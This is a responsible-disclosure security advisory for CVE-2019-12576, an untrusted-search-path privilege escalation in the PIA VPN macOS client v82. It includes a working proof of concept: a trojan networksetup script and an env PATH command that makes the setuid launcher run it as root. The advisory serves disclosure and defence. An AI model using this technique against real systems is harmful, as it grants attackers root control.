Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

77 lines (45 sloc) 2.17 KB
Title: PIA macOS Privilege Escalation: Untrusted Search Path
Author: Rich Mirch
CVE: CVE-2019-12576
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for macOS could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA macOS openvpn_launcher binary is setuid root. This program is called
during the connection process and executes several operating system utilities
to configure the system. The networksetup utility is called using relative paths.
A local unprivileged user can execute arbitrary commands as root by creating a
networksetup trojan which will be executed during the connection process. This
is possible because the PATH environment is not reset prior to executing the
OS utility.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6
Test Environment
OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v82
Steps to reproduce
All steps are executed as a low privileged user.
Step 1 - Create a script named networksetup with the following two lines. This
PoC will send the output of the id command to wall. This will show that its
running with root privileges(uid=0).
#!/bin/sh
echo "$0: $(/usr/bin/id)"|/usr/bin/wall
Step 2 - Make the networksetup script executable.
chmod 755 networksetup
Step 3 - Execute run.sh to open the PIA GUI client while prepending the current
working directory($PWD) to the PATH environment variable. This ensures that the
trojan networksetup script is executed first because relative paths are used.
env "PATH=$PWD:$PATH" /Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh
Step 4 - Login and connect to the VPN
During the connection process networksetup will be executed as root and see a
wall message will be broadcasted showing the output of id command with uid=0.
Timeline:
2018-12-18: Reported to vendor
2018-12-19: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83 however this version was never released.
The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure
You can’t perform that action at this time.